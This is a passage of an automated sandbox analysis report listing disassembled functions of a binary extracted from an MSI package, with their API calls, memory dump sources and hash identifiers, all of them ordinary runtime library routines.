                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb4c46ddc35d12d83be402e24fd6375497e2ddcd9213e3c03b20c4011913a350
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9016D31504214DFD722BF98F908AA4BB69FF49351B04049AF84297324CB361D41EBA1
                                                                                                                                                                                                                                                                      Function 00FBBB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000018,8F6E4A30,?,00000000), ref: 00FBBBA3
                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00FBBD7F
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                                      • API String ID: 3924972193-2658103896
                                                                                                                                                                                                                                                                      • Opcode ID: e153a1b2ab742f1abb5ff7c1fb0a0f06dd056bc96d576ab45796473038ed378d
                                                                                                                                                                                                                                                                      • Instruction ID: e58dbcc267918700cdc5611cf82d28e399cab5060892ee6b9b72583573cf2987
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e153a1b2ab742f1abb5ff7c1fb0a0f06dd056bc96d576ab45796473038ed378d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7161A1B1D00348DBDB10DFA5CD41BDEB7B8FF05304F14825AE945AB281E7B9AA44DB91
                                                                                                                                                                                                                                                                      Function 00FCD3CB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FCD3D2
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: __EH_prolog3.LIBCMT ref: 00FC2555
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00FC255F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00FC25D0
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FCD46E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                      • String ID: %.0Lf$0123456789-
                                                                                                                                                                                                                                                                      • API String ID: 2544715827-3094241602
                                                                                                                                                                                                                                                                      • Opcode ID: 51f7e6cc867f5a5366aa9fadc006547697a66addc2341b9e0d74f45e7a2c479c
                                                                                                                                                                                                                                                                      • Instruction ID: fe99cb20b90774c33b8e7d1bee351e017ec28f9ce0ef67d2586af6fab6754bfc
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51f7e6cc867f5a5366aa9fadc006547697a66addc2341b9e0d74f45e7a2c479c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0418B31900219DFCF05DFA4CD81EEDBBB5BF08314F000069E901AB255DB34EA5AEBA1
                                                                                                                                                                                                                                                                      Function 00FCD66F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FCD676
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8657
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8679
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB86A1
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB880E
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FCD712
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                                      • String ID: 0123456789-$0123456789-
                                                                                                                                                                                                                                                                      • API String ID: 3042121994-2494171821
                                                                                                                                                                                                                                                                      • Opcode ID: b7e5dd43d893eed6143b97d66dc1754a0f58d387e5d7e18c21b0547bb717b65b
                                                                                                                                                                                                                                                                      • Instruction ID: a92ba926cea6b57ab91cc0d66f44c4ae661b69bc2499017c43b1474caeeb2478
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7e5dd43d893eed6143b97d66dc1754a0f58d387e5d7e18c21b0547bb717b65b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5418C71900219DFCF01EFA4CD81AEEBBB5BF08310F140069E901AB255DB34EA56EFA1
                                                                                                                                                                                                                                                                      Function 00FD175A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FD1761
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92A0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92C2
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB92EA
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB9422
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FD17FB
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                                      • String ID: 0123456789-$0123456789-
                                                                                                                                                                                                                                                                      • API String ID: 3042121994-2494171821
                                                                                                                                                                                                                                                                      • Opcode ID: fd8fe1ac32c85e5f5f100bf4d1ea19a370b29f78f24cabeef9498aed17741f63
                                                                                                                                                                                                                                                                      • Instruction ID: 0c12e646b24d5269ec56260f63c571a2cff4bc3f3139d84faff3ceb33f3c241a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd8fe1ac32c85e5f5f100bf4d1ea19a370b29f78f24cabeef9498aed17741f63
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96416D31D00209EFCF05DFA4D881AEEBBB6BF04310F14415AF911A7262DB799A02EF91
                                                                                                                                                                                                                                                                      Function 00FC8386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC838D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1C42: _Maklocstr.LIBCPMT ref: 00FC1C62
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1C42: _Maklocstr.LIBCPMT ref: 00FC1C7F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1C42: _Maklocstr.LIBCPMT ref: 00FC1C9C
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1C42: _Maklocchr.LIBCPMT ref: 00FC1CAE
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1C42: _Maklocchr.LIBCPMT ref: 00FC1CC1
                                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 00FC841A
                                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 00FC8434
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                                      • API String ID: 2939335142-1686923651
                                                                                                                                                                                                                                                                      • Opcode ID: 91bfb7a5ecffb0a87523b0d08e8c9b5ea2ccfe762c473e62afabecbb5847f253
                                                                                                                                                                                                                                                                      • Instruction ID: f566e3fbaa278ce7ac90369a1b9231d55b1d662751afd48c4593baa1cd378bbf
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91bfb7a5ecffb0a87523b0d08e8c9b5ea2ccfe762c473e62afabecbb5847f253
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F21C1B1804B92AED725DF75C881B7BBEF8BB09300F04455EE099C7A42D734EA02DB90
                                                                                                                                                                                                                                                                      Function 00FCFFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Mpunct$H_prolog3
                                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                                      • API String ID: 4281374311-1686923651
                                                                                                                                                                                                                                                                      • Opcode ID: 608336f44b67059ff46a5cfdec8d315d76d99c05cebe218581307f2eee5c7f27
                                                                                                                                                                                                                                                                      • Instruction ID: e82f419901478b1e56f77af4d7055737e9370754012a48cee2f87416846773f3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 608336f44b67059ff46a5cfdec8d315d76d99c05cebe218581307f2eee5c7f27
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B221C4B1804B926FD725DF758894B7BBEF9AB09301F08491EE099C7A42D774E601DB90
                                                                                                                                                                                                                                                                      Function 00FB24C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FB1434,?,00000000), ref: 00FB2569
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FB1434,?,00000000), ref: 00FB2589
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00FB1434,?,00000000), ref: 00FB25DF
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,8F6E4A30,?,00000000,00FF3C40,000000FF,00000008,?,?,?,?,00FB1434,?,00000000), ref: 00FB2633
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,8F6E4A30,?,00000000,00FF3C40,000000FF,00000008,?,?,?,?,00FB1434), ref: 00FB2647
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Local$AllocFree$CloseHandle
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1291444452-0
                                                                                                                                                                                                                                                                      • Opcode ID: 5cf2149864f42028b0f557872210f94e6b50539098fc15c4407b3aac216076fd
                                                                                                                                                                                                                                                                      • Instruction ID: 8c1faa17146175d8c2e25f34719ddb8d93d9cb5530ae264dd92422c08e8e5795
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cf2149864f42028b0f557872210f94e6b50539098fc15c4407b3aac216076fd
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B411B32A003159BC364AF29DC94BEAB7D9EF45360F14072AF526C72D0DB30D944EB50
                                                                                                                                                                                                                                                                      Function 00FF1D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetConsoleOutputCP.KERNEL32(8F6E4A30,?,00000000,?), ref: 00FF1DFE
                                                                                                                                                                                                                                                                        • Part of subcall function 00FEA9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FE6F5E,?,00000000,-00000008), ref: 00FEAA67
                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FF2059
                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FF20A1
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00FF2144
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                      • Opcode ID: 920b46321aeaae0512cdfae99e9d54bed0c8fea23a7c37f672ed0dd0d1c551b3
                                                                                                                                                                                                                                                                      • Instruction ID: f105de05c473317c6a61e81ffc9ceb3f8730430d661f39599f195f5450927878
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 920b46321aeaae0512cdfae99e9d54bed0c8fea23a7c37f672ed0dd0d1c551b3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4ED167B6D002489FCB15CFA8D880AADBBB5FF09310F18452AEA55EB361DB30A941DB50
                                                                                                                                                                                                                                                                      Function 00FC35F7 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 838279627-0
                                                                                                                                                                                                                                                                      • Opcode ID: 9617c0bc9ec3bfa49343535f7b9d1f4afd0ed7a80811105dbc55212f5b82acec
                                                                                                                                                                                                                                                                      • Instruction ID: 91b9094f66b65b838c17283d071d22b15fe94ce18cbda61e9f59da7859e7c175
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9617c0bc9ec3bfa49343535f7b9d1f4afd0ed7a80811105dbc55212f5b82acec
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32B15CB5D0025ADFDF11DF94CA82EEEBBB5FF48350F148019E805AB251D734AA45EB60
                                                                                                                                                                                                                                                                      Function 00FBDA6F Relevance: 6.3, APIs: 4, Instructions: 279COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 838279627-0
                                                                                                                                                                                                                                                                      • Opcode ID: e21e681eff894d116bb5b172775cce18bbd72d0235e61c7172ad000b1dc69a16
                                                                                                                                                                                                                                                                      • Instruction ID: 25900eaaa3ef9a8f35dfae3fc01ff159c0592268eeed6f64da3ad0efead6ebe7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e21e681eff894d116bb5b172775cce18bbd72d0235e61c7172ad000b1dc69a16
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1B16975D002499FDF10DF99CD81AEEBBB9EF48310F144019E805AB216E774AE46EFA1
                                                                                                                                                                                                                                                                      Function 00FD5A58 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                      • Opcode ID: eca770ad8dff528e5f9364d43a75d550d84ef6066c71b3b7e7ec696644e53c46
                                                                                                                                                                                                                                                                      • Instruction ID: ac8ff7c67a4527f049a8f9b20a571623974b564df4454ab4a208c1d876d244e8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eca770ad8dff528e5f9364d43a75d550d84ef6066c71b3b7e7ec696644e53c46
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6951E476A00B169FDB298F54D841B7A77A6EF80B21F1C452FE8454B391E735EC40EB50
                                                                                                                                                                                                                                                                      Function 00FE24E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 95415baaa540fa1b5051eabbe5e6754819371e56fe4623703cfc7b77d26f8a07
                                                                                                                                                                                                                                                                      • Instruction ID: 8f134b08f727489e97954063b99ca385fcda2cb10750d0d75f83f571c78bdfdc
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95415baaa540fa1b5051eabbe5e6754819371e56fe4623703cfc7b77d26f8a07
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2021DEB2A04385AFDB60AF62CE61D2A77ADBF443607184516F8158B250FB30EC10B7A0
                                                                                                                                                                                                                                                                      Function 00FB6FB0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00FB6FB7
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
